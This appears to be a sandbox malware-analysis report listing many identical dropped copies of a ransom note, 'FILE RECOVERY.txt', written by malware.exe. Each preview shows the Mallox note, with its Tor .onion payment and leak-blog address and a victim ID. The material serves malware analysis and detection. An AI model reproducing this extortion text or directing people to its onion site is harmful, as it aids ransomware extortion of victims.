                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
